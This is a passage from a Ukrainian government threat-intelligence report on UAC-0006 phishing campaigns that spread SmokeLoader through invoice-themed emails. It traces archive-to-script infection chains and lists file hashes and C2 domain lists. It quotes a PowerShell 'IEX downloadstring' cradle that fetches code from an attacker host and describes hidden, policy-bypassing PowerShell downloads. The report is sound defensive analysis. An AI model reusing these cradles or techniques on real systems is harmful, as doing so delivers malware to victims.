Uac0006 FC PDF
Uac0006 FC PDF
Uac0006 FC PDF
https://scpc.gov.ua/
December, 2023
Executive Summary
Starting from May 2023, the analysts of the Cyber Incidents Response Operational
Centre of the State Cyber Protection Centre of the State Service of Special
Communications and Information Protection of Ukraine (hereinafter referred to as
the CIROC SCPC SSSCIP) point out the increasing intensity of mass phishing
emails distribution activity, that is attributed to UAC-0006 operations.
A whole series of CERT-UA alerts correspond to this activity (since May, 5, 2023):
● UAC-0006 coming back: Mass distribution of SmokeLoader using the
"accounts" theme (CERT-UA#6613);
● UAC-0006 cyberattack: SmokeLoader distribution via emails and
"accounts" theme (CERT-UA#6757);
● The threat level for accountants is increasing: the UAC-0006 group carried
out the third cyber attack in 10 days (CERT-UA#7065, CERT-UA#7076);
● UAC-0006 rate increase, loss of millions (CERT-UA#7648, CERT-UA#7688,
CERT-UA#7699, CERT-UA#7705)
2
● .lzh (LHARK archive) -> .lzh (LHARK archive) -> .jpg (SmokeLoader
executable) + .pdf.exe (WinRAR SFX archive) -> .bat + .pdf;
● .zip (polyglot archive) -> .doc (ZIP archive) -> .jpg (SmokeLoader executable)
+ .pdf.exe (WinRAR SFX archive) -> .bat + .pdf;
● .zip (ZIP archive) -> .pdf (ZIP archive) -> .jpg (SmokeLoader executable) +
.pdf.exe (WinRAR SFX archive) -> .bat +.pdf;
● .zip (polyglot archive) -> .pdf.exe (WinRAR SFX archive) -> .exe
(SmokeLoader executable) + .pdf;
● .zip (ZIP archive) -> .pdf (ZIP archive) -> .exe (WinRAR SFX archive) -> .exe
(SmokeLoader executable) + .pdf;
● .zip (polyglot archive) -> .pdf (ZIP archive) -> .docx + .pdf.exe (WinRAR SFX
archive) ->.exe (SmokeLoader executable) + .pdf;
● .zip (polyglot archive) -> .doc (ZIP archive) -> .jpg (SmokeLoader executable)
+ .jpeg.exe (WinRAR SFX archive) -> .bat + .jpeg;
● .zip (polyglot archive) -> (3) .xls.exe (SmokeLoader executable);
● .zip (polyglot archive) -> (3) .xls.js -> .dat (SmokeLoader executable);
● .pdf (embedded link) -> .zip (ZIP archive) -> .pdf (polyglot archive) -> (3)
.xls.js -> .dat (SmokeLoader executable);
● .zip (polyglot archive) -> .pdf (ZIP archive) -> (3) .xls.js -> .dat (SmokeLoader
executable);
● .zip (polyglot archive) -> .docx (ZIP archive) -> (2) .pdf.js -> .exe
(SmokeLoader executable);
● .zip (polyglot archive) -> .docx (ZIP archive) -> .pdf.js -> .dat (SmokeLoader
executable);
● .tar (RAR archive) -> .doc (TAR archive) -> .xls.vbs -> .exe (SmokeLoader
executable);
● .zip (polyglot archive) -> .7z (7-Zip archive) -> (2) .xls.exe (SmokeLoader
executable).
It's worth mentioning that some SmokeLoader capabilities as well as its tactics
and strategies were described in the recent report "The Surge in SmokeLoader
Attacks on Ukrainian Institutions", prepared by the National Cybersecurity
Coordination Centre within the National Security and Defense Council of Ukraine.
This is the first joint analytical report prepared by the CIROC SCPC SSSCIP in
collaboration with the Palo Alto Networks Unit 42 Threat Intelligence team. The
CIROC SCPC SSSCIP would like to express the deep gratitude to Palo Alto
Networks Unit 42 for the technical consulting and expert assistance they have
provided. We are thankful for your day-to-day diligent high-quality analytical work
and continuous support to Ukrainian organisations to maintain and enhance our
national resilience capabilities under the pressure of constant expansion of the
cyber threat landscape.
3
Table of Contents
Executive Summary 2
Table of Contents 4
Methodology 6
30 May 2023, "Fw: Invoice", "Re: Invoice", "Fw: Re: Invoice", "bill for May", "Bill
to pay", "Bills to pay", "Bills redirected", "Fw: act of reconciliation", "act of
reconciliation", "act of reconciliation and accounts",
"act_of_reconciliation_and_accounts" 14
21 July 2023, "Fw: Re: Invoice", "Fw: Invoice", "Re: Invoice", "Re: act of
reconciliation and accounts", "Invoice", "act of reconciliation and accounts
for July" 26
30 August 2023, "Bill for payment (natural gas) (PG) No. 806 dated August
24, 2023" 42
Pale September 45
4
20 September 2023, "Re: Bill to pay" 48
October Nights 51
10 - 11 October 2023, "Fw: Reconciliation act for the 3rd quarter of 2023." 67
November Rain 70
9-23 November 2023, "Fw[2]: Act of reconciliation. and invoice", "Fw: Act of
reconciliation. and invoice", "Invoice", "Fw: Invoice", "Re: Invoice", "Fw: Re:
Invoice", "Fw: act of reconciliation", "Re: Act of reconciliation", "Re: act of
reconciliation and accounts", "Accounting Invoice for payment", "Statement
and account", "Thank you the bill attached", "Account to be paid", "act of
reconciliation and invoice", "Fwd:act of reconciliation and invoice" 76
Outlook 85
Indicators of Compromise 88
5
Methodology
The report is based on information about the detected phishing attacks as well as
on processed endpoint and network data that are obtained during the process of
everyday monitoring operations performed by the CIROC SCPC SSSCIP team.
Endpoint and network data are automatically processed via the software and
software&hardware tools of the Endpoint Protection Subsystem and the
Network Telemetry Collection Subsystem that represent the components of the
Vulnerability Detection and Cyber Incidents/Cyber Attacks Response System.
The analysts of the CIROC team analyse phishing attacks carried out against:
● the cyber protection objects defined in clause 1 of the Resolution of the
Cabinet of Ministers of Ukraine No. 1295 of December 23, 2020 "Certain
Issues of Ensuring Operation of the Vulnerability Detection and Cyber
Incidents/Cyber Attacks Response System";
● Ukrainian organisations regardless of their industry affiliation and
ownership form, whose incoming and outgoing emails are monitored with
the usage of functionality of the third-party service provider’s threat
analytics platform.
The SCPC SSSCIP is also the security administrator of the National Backing-up
Centre of State Information Resources (hereinafter referred to as the National
Centre). As the subject of the National Centre within the scope of achieving the
implementation objective ("vulnerability detection and response to cyber
incidents and cyberattacks against the National Centre’s national electronic
information resources'', as defined in clause 11, subclause 1 of the Resolution of the
Cabinet of Ministers of Ukraine No. 311 of April 7, 2023 "Certain issues related to the
operation of the National Backing-up Centre of State Information Resources"), the
SCPC SSSCIP processes phishing attack information obtained from analysing the
email protection service data of the Cybersecurity Services Platform of the
National Centre.
6
CHRONOLOGY OF APPLIED ATTACK VECTORS
Figure 1 displays the timechart of the UAC-0006 activity cluster (by the number of
phishing incidents of specific attack chains), targeting Ukraine during May 2023.
30.05.2023
.html ->
.zip (ZIP archive) -> 19
.js ->
.exe (SmokeLoader executable)
10.05.2023
0 40 80
The mass distribution of the SmokeLoader via phishing emails with the subject
"До оплати" (eng: "To pay", translation from Ukrainian) was detected by the
CIROC SCPC SSSCIP on May 10, 2023. Tables 1 and 2 contain a brief overview of the
applied attack vector and the sequence of the infection chain that are relevant to
this case.
Attack Vector
Infection Chain
1c470c329ff638c7963867756425373b73520c621aa924e6714c5134e6373555
(pax_BT192.zip) ->
f9a50abad773e08204718c689c1e71147bdae8c3a0094639e732fedf6165ab89
(pax_BT192.js) ->
ae74817df2569f0619a180f569caf62d7ac5d5418f7a64cb4e21724f20d96dd6
(TempyGq41.exe)
The phishing email (observed email subject - "До оплати") contains .zip
attachment [T1566.001] (polyglot archive "pax_BT192.zip" [T1036.008]), the
unpacking of which results in the execution of one of the two scenarios:
1) extracting the .pdf file "pax_BT192.pdf" that contains no signs of the
malicious content;
2) extracting the highly obfuscated .js file "pax_BT192.js". Hexadecimal
numbering, non-descriptive function and variable names, string
concatenation and encoding, non-standard usage of arithmetic operations
in function calls are the most obvious obfuscation techniques that are used
within the JavaScript code and directly affect the control flow complexity.
Opening this .js file [T1204.002] through WScript.exe causes the execution
of the following PowerShell command [T1059.001] (namely downloading a
file from hxxp://homospoison[.]ru/one/portable[.]exe, saving it under the
hidden folder AppData located in C:\Users\%USERNAME%\AppData
[T1564.001] (C:\Users\%USERNAME%\AppData\Local\TempyGq41.exe
path) and its further execution) via cmd.exe [T1059.003] :
9
PowerShell script here is executed with the ExecutionPolicy parameter value
"Bypass" (means nothing is blocked and there are no warnings or prompts while
running the script), with the specified NoProfile parameter (means running the
script without loading the user's profile script, i.e. with minimal interference from
user-specific settings in order to avoid detection) and with the WindowStyle
parameter value "Hidden" [T1564.003] (means running the script in the
background without displaying a visible console window, i.e. without displaying
any visible indication to the user, making it less likely to be detected).
TempyGq41.exe (file type - Win32 EXE) is the actual SmokeLoader sample, the C2
configuration of which is represented in Table 3 [T1071.001] (totally 14 domains, 11
among which are active).
C2 Connections Configuration
http://coudzoom.ru/
http://balkimotion.ru/
http://ligaspace.ru/
http://ipodromlan.ru/
http://redport80.ru/
http://superboler.com/
http://lamazone.site/
http://criticalosl.tech/
http://3dstore.pro/
http://humanitarydp.ug/
http://shopersport.ru/
http://sindoproperty.org/
http://maximprofile.net/
http://zaliphone.com/
10
29 May 2023, "bill for May",
"act_of_reconciliation_and_accounts", "act of
reconciliation and accounts"
The mass distribution of the SmokeLoader via phishing emails with the subjects
"рахунок за травень" (eng: "bill for May", translation from Ukrainian),
"акт_звірки_та_рахунки" (eng: "act_of_reconciliation_and_accounts", translation
from Ukrainian), "акт звірки та рахунки" (eng: "act of reconciliation and
accounts", translation from Ukrainian) were detected by the CIROC SCPC SSSCIP
on May 29, 2023. Tables 4 and 5 contain a brief overview of the applied attack
vector and the sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
5c85249d375a3a38e87a45857c069c6710caef1e521194eed1b4c1ff463e5b0b
("акт_звірки_рахунки.zip") ->
c32974b865152c6ca3c5f0cc787319dfc2b32ea1bebc1f37f6c36d2ca75439c8
("акт_звірки_та_рахунки.html") ->
b9e7780b1bf98b1f2e0fd25c793530891bbb678da743be6229d3466234c9e56c
("акт_звірки_рахунки.zip") ->
51073b3884699eb4779004ab08d793635f3913c36139bce9ff0aead9f383849c
("акт_звірки_від_05_2023р.js" / "рахунок_№415_2023.js"/"рахунок_№416_2023.js") ->
6667500156d0b0d81fb98d32794c8c50de82fc915d2a59780e9b6e1b9f78ada7
("TempuwN57.exe")
Exploring the content of the .html file one can notice that the legitimate JS
instrument Blob is exploited (see Fig. 2) [T1059.007] for further delivering the
malicious content to the victim. Blob (Binary Large Object) is oftenly used for
storing and manipulating objects containing large arrays of data (usually files) as
small chunks of bytes, that is especially useful for performing operations that
require processing large amounts of data on the client side.
11
Figure 2. A fragment of the “акт_звірки_та_рахунки.html” file
Opening either of these three files through WScript.exe causes the execution of
the following PowerShell command [T1059.001] (namely downloading a file from
hxxp://premiumjeck[.]site/one/renew[.]exe, saving it under the hidden folder
AppData located in C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Local\Temp\TempuwN57.exe" path) and its
further execution) via cmd.exe [T1059.003]:
"TempuwN57.exe" file (file type - Win32 EXE) is the actual SmokeLoader sample,
the C2 configuration of which is represented in Table 6 [T1071.001] (totally 26
domains, 10 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
12
Execution Scenario (1):
5c85249d375a3a38e87a45857c069c6710caef1e521194eed1b4c1ff463e5b0b
("акт_звірки_рахунки.zip") ->
c32974b865152c6ca3c5f0cc787319dfc2b32ea1bebc1f37f6c36d2ca75439c8
("акт_звірки_та_рахунки.html") ->
b9e7780b1bf98b1f2e0fd25c793530891bbb678da743be6229d3466234c9e56c
("акт_звірки_рахунки.zip") ->
51073b3884699eb4779004ab08d793635f3913c36139bce9ff0aead9f383849c
("акт_звірки_від_05_2023р.js" / "рахунок_№415_2023.js" / "рахунок_№416_2023.js") ->
6667500156d0b0d81fb98d32794c8c50de82fc915d2a59780e9b6e1b9f78ada7 ("TempuwN57.exe")
C2 Connections Configuration
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
http://zalamafiapopcultur.eu/
http://hopentools.site/
http://kismamabeforyougo.com/
http://kissmafiabeforyoudied.eu/
http://gondurasonline.ug/
http://nabufixservice.name/
http://filterfullproperty.ru/
http://alegoomaster.com/
http://freesitucionap.com/
http://droopily.eu/
http://prostotaknet.net/
http://zakolibal.online/
http://verycheap.store/
13
30 May 2023, "Fw: Invoice", "Re: Invoice", "Fw: Re: Invoice",
"bill for May", "Bill to pay", "Bills to pay", "Bills redirected",
"Fw: act of reconciliation", "act of reconciliation", "act of
reconciliation and accounts",
"act_of_reconciliation_and_accounts"
The mass distribution of the SmokeLoader via phishing emails with the subjects
"Fw: Рахунок-фактура" (eng: "Fw: Invoice", translation from Ukrainian), "Re:
Рахунок-фактура" (eng: "Re: Invoice", translation from Ukrainian), "Fw: Re:
Рахунок-фактура" (eng: "Fw: Re: Invoice", translation from Ukrainian), "рахунок
за травень" (eng: "bill for May", translation from Ukrainian), "Рахунок до оплати"
(eng: "Bill to pay", translation from Ukrainian), "Рахунки до оплати" (eng: "Bills to
pay", translation from Ukrainian), "Рахунки перенаправленно" (eng: "Bills
redirected", translation from Ukrainian with a spelling mistake), "Fw: акт звірки"
(eng: "Fw: act of reconciliation", translation from Ukrainian), "акт звірки" (eng: "act
of reconciliation", translation from Ukrainian), "акт звірки та рахунки" (eng: "act
of reconciliation and accounts", translation from Ukrainian),
"акт_звірки_та_рахунки" (eng: "act_of_reconciliation_and_accounts", translation
from Ukrainian) were detected by the CIROC SCPC SSSCIP on May 30, 2023. Tables
7 and 8 contain a brief overview of the applied attack vector and the sequence of
the infection chain that are relevant to this case.
Attack Vector
Infection Chain
54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088
("Рахунок (без ПДВ) № 28 від 28.05.2023.zip") ->
375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
("AKT_28_05_2023p._pax_28_05_2023p.vbs") ->
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
("MgkGCs.exe")
14
28.05.2023.zip" [T1036.008]), the unpacking of which results in the execution of
one of the two scenarios:
1) extracting .pdf file "Рахунок (без ПДВ) № 28 від 28.05.2023.pdf" that
contains no signs of the malicious content;
2) extracting "AKT_28_05_2023p._pax_28_05_2023p.vbs" file. Opening the
.vbs file [T1204.002] through WScript.exe causes the execution of the
following command:
"MgkGCs.exe" file (file type - Win32 EXE) is the actual SmokeLoader sample, the
C2 configuration of which is represented in Table 9 [T1071.001] (totally 26 domains,
10 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
15
Execution Scenario (1):
54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088
("Рахунок (без ПДВ) № 28 від 28.05.2023.zip") ->
375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
("AKT_28_05_2023p._pax_28_05_2023p.vbs") ->
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
("MgkGCs.exe")
C2 Connections Configuration
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
http://zalamafiapopcultur.eu/
http://hopentools.site/
http://kismamabeforyougo.com/
http://kissmafiabeforyoudied.eu/
http://gondurasonline.ug/
http://nabufixservice.name/
http://filterfullproperty.ru/
http://alegoomaster.com/
http://freesitucionap.com/
http://droopily.eu/
http://prostotaknet.net/
http://zakolibal.online/
http://verycheap.store/
16
CHRONOLOGY OF APPLIED ATTACK VECTORS
Figure 5 displays the timechart of the UAC-0006 activity cluster (by the number of
phishing incidents of specific attack chains), targeting Ukraine during July 2023.
0 30 60
The mass distribution of the SmokeLoader via phishing emails with the subjects
"Акт за травень" (eng: "Act for May", translation from Ukrainian), "Re:
Рахунок-фактура" (eng: "Re: Invoice", translation from Ukrainian), "Fw:
Рахунок-фактура" (eng: "Fw: Invoice", translation from Ukrainian) were detected
by the CIROC SCPC SSSCIP on July 13, 2023. Tables 10 and 11 contain a brief
overview of the applied attack vector and the sequence of the infection chain that
are relevant to this case.
Attack Vector
Infection Chain
be33946e29b3f0d2f3b1b68042bd6e81f64a18da0f0705d104a85f1bee207432
("Акт_Звiрки_та_рах.факт_вiд_12_07_2023.zip") ->
20492a4d0d84f8beb1767f6616229f85d44c2827b64bdbfb260ee12fa1109e0e
("Акт_Звiрки_вiд_12_07_2023р.txt.doc") +
7ce9d6aba2f689b9fe636f0bc29cd7202608d0f84730b49ab3a894e0eecb6334
("рахунок_вiд_12_07_2023_до_оплати.vbs") ->
9e19ad9e55c46bac4160d3d69232bbbac37493d3a4ac965304e10f2b660a4f22
("1.exe" / "2.exe")
18
The encoded part is decoded as:
"1.exe"/"2.exe" (file type - Win32 EXE) represent the identical SmokeLoader sample
(but with two different names), the C2 configuration of which is represented in
Table 12 [T1071.001] (totally 32 domains, 9 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
19
Execution Scenario (1):
be33946e29b3f0d2f3b1b68042bd6e81f64a18da0f0705d104a85f1bee207432
("Акт_Звiрки_та_рах.факт_вiд_12_07_2023.zip") ->
20492a4d0d84f8beb1767f6616229f85d44c2827b64bdbfb260ee12fa1109e0e
("Акт_Звiрки_вiд_12_07_2023р.txt.doc") +
7ce9d6aba2f689b9fe636f0bc29cd7202608d0f84730b49ab3a894e0eecb6334
("рахунок_вiд_12_07_2023_до_оплати.vbs") ->
9e19ad9e55c46bac4160d3d69232bbbac37493d3a4ac965304e10f2b660a4f22
("1.exe" / "2.exe")
C2 Connections Configuration
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
20
14 July 2023, "act of reconciliation and accounts",
"act_of_reconciliation_and_accounts", "Invoice"
The mass distribution of the SmokeLoader via phishing emails with the subjects
"акт звірки та рахунки" (eng: "act of reconciliation and accounts", translation
from Ukrainian), "акт_звірки_та_рахунки" (eng:
"act_of_reconciliation_and_accounts", translation from Ukrainian),
"Рахунок-фактура" (eng: "Invoice", translation from Ukrainian) were detected by
the CIROC SCPC SSSCIP on July 14, 2023. Tables 13 and 14 contain a brief overview
of the applied attack vector and the sequence of the infection chain that are
relevant to this case.
Attack Vector
Infection Chain
f664f4122f5cf236e9e6a7aabde5714dfe9c6c85bd4214b5362b11d04c76763d
("новые реквизиты та рах. ф. до оплати.zip") ->
da07c6e72b5dbab781d70013d066acbf5052f603534f6f084bb77578b0a51c39
("рахунок_вiд_13_07_2023_до_оплати.vbs") ->
9cc15fabac4e68ad9ac19a128986a792255a9da23f7f5bd115bb3533f40fa796
("1.exe" / "2.exe")
21
The encoded part is decoded as:
IEX (New-Object Net.Webclient).downloadstring
("hxxp://liverpulapp[.]ru/htainfo[.]txt")
"1.exe"/"2.exe" (file type - Win32 EXE) represent the identical SmokeLoader sample
(but with two different names), the C2 configuration of which is represented in
Table 15 [T1071.001] (totally 32 domains, 9 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
22
Execution Scenario (1):
da07c6e72b5dbab781d70013d066acbf5052f603534f6f084bb77578b0a51c39
("новые реквизиты та рах. ф. до оплати.zip") ->
da07c6e72b5dbab781d70013d066acbf5052f603534f6f084bb77578b0a51c39
("рахунок_вiд_13_07_2023_до_оплати.vbs") ->
9cc15fabac4e68ad9ac19a128986a792255a9da23f7f5bd115bb3533f40fa796
("1.exe" / "2.exe")
C2 Connections Configuration
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
23
14 July 2023, "act_of_reconciliation_and_accounts"
The mass distribution of the SmokeLoader via phishing emails with the subject
"акт_звірки_та_рахунки" (eng: "act_of_reconciliation_and_accounts", translation
from Ukrainian) was detected by the CIROC SCPC SSSCIP on July 14, 2023. Tables
16 and 17 contain a brief overview of the applied attack vector and the sequence of
the infection chain that are relevant to this case.
Attack Vector
Infection Chain
124cb13096784d005a013bbc9488047b167d76bebf30b5700c2f575c32d72993
("Спiсок_счетов_вiд_14_07_2023р.zip") ->
d138da2039ef93b0b511bc380f3be1f53a9859e616973afae6059d0225cb40cf
("UKR_net_рахунки_№418_до_оплати_вiд_14_07_2023_Архив.html" /
"UKR_net_рахунки_№419_до_оплати_вiд_14_07_2023_Архив.html" /
"UKR_net_рахунки_№420_до_оплати_вiд_14_07_2023_Архив.html") ->
2e90d948d354426bc6df9baab02d922e7f20ef7056da780d58f57b6aa54ceb20
("рахунки_до_оплати_вiд_14_07_2023_Архив_rar.exe")
24
"рахунки_до_оплати_вiд_14_07_2023_Архив_rar.exe" (file type - Win32 EXE) is
the actual SmokeLoader sample, the C2 configuration of which is represented in
Table 18 [T1071.001] (totally 32 domains, 9 among which are active).
C2 Connections Configuration
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
25
21 July 2023, "Fw: Re: Invoice", "Fw: Invoice", "Re: Invoice",
"Re: act of reconciliation and accounts", "Invoice", "act of
reconciliation and accounts for July"
The mass distribution of the SmokeLoader via phishing emails with the subjects
"Fw: Re: Рахунок-фактура" (eng: "Fw: Re: Invoice", translation from Ukrainian),
"Fw: Re: Счет-фактура" (eng: "Fw: Re: Invoice", translation from Russian), "Fw:
Рахунок-фактура" (eng: "Fw: Invoice", translation from Ukrainian), "Fw:
Счет-фактура" (eng: "Fw: Invoice", translation from Russian), "Re:
Рахунок-фактура" (eng: "Re: Invoice", translation from Ukrainian), "Re:
Счет-фактура" (eng: "Re: Invoice", translation from Russian), "Re: акт звірки та
рахунки" (eng: "Re: act of reconciliation and accounts", translation from
Ukrainian), "Счет-фактура" (eng: "Invoice", translation from Russian), "акт звірки
